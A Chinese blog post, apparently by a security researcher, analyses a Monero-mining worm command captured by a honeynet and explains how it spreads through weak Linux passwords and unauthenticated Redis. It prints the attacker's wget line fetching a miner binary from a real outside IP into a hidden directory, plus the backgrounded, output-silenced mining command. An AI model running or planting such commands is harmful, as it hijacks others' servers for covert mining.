余弦:蠕虫挖矿一例,无码
给大家分享网络空间里发家致富的一个野路子:蠕虫挖矿,套比特币等虚拟货币。下面这是我们捕获到的真实案例,门开了一条缝,更多的请自行探索,以免有带坏嫌疑。
-----------------
今天凌晨,我们的蜜网系统跳出了个有趣的字符串:
红框里的内容是:
zaxa2aq@protonmail.comProtonMail!前段时间我们的分享(推荐安全且匿名的邮箱 ProtonMail)似乎暗示着某种巧合,这不得不引起我们的兴趣。意料之内,匿名是把双刃剑,剑的另一端,“匿名之恶”会让人性丑恶发挥到极致。 以前我说过,黑暗森林法则同样适用于这个网络空间:被发现即被干掉。不好意思,这次是我们“干掉”了对方。 上面这个字符串完整内容是:
(exec /var/tmp/.war/1 -a cryptonight -o stratum+tcp://http://xmr.pool.minergate.com:45560 -u zaxa2aq@protonmail.com -p x &> /dev/null &)我简单解释下这条 Bash 命令:
exec,负责执行后面的命令,细节用途自行查阅。 /var/tmp/.war/1,这个文件由下面这条命令创建: wget http://95.128.182.166/javascripts/minerd -O /var/tmp/.war/1 1 == minerd minerd 之后的参数: -a cryptonight -o stratum+tcp://http://xmr.pool.minergate.com:45560 -u zaxa2aq@protonmail.com -p x 目测和比特币等这类货币的挖矿有关,因为:http://minergate.com 就是这样的邪恶挖矿大平台。合法存在。 &> /dev/null 无视标准输出与错误输出。 最后的 &,表示这条命令放到后台执行。 最外层的小括号(),表示创建一个新的 Shell。上面的7点解释,重点看第4点就好。 为了确定我们的“目测”,我们用我们唯一的官方邮箱“lant34m@protonmail.com”同样在 http://minergate.com 上注册了个账号。在这个平台深度体验一番,不得不感慨,挖矿的世界真是眼花缭乱,满地宝藏既视感。 这个平台上,我们发现下面这个挖矿说明链接:
Smart multicurrency mining pool & 1-click GUI miner部分区域截图如下:
红框里的内容是:
minerd -a cryptonight -o stratum+tcp://http://xmr.pool.minergate.com:45560 -u lant34m@protonmail.com -p x对比下上面的第4点,这下确定了吧?另外,这个 minerd 本身还是开源的...你可以根据自己的特殊要求修改编译。 好,回到开头,这个蠕虫其实不是什么新鲜玩意,传播的主要方式是通过 Linux 服务器的弱口令及一些漏洞(比如:Redis 那个未授权访问缺陷)。 这个蠕虫感染一万台服务器,那么就有一万个挖矿节点... 别说运用什么 0day,就是用到一些上古时代的技术,我们也能在这个健壮又脆弱的网络空间里成为“有钱人”。 还好,我们不是坏人。 ----------------- 这个案例够清晰吧?还想看到更多的吗?经过“懒人在思考”的白话润色,保证你即使不懂技术,也能涨姿势。 网络空间,这个巨型大脑,真美... ----------------- 微信公众号「Lazy-Thought」 几个黑客在维护,都很懒,都想改变点什么
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
余弦
关注网络尖刀微信公众号
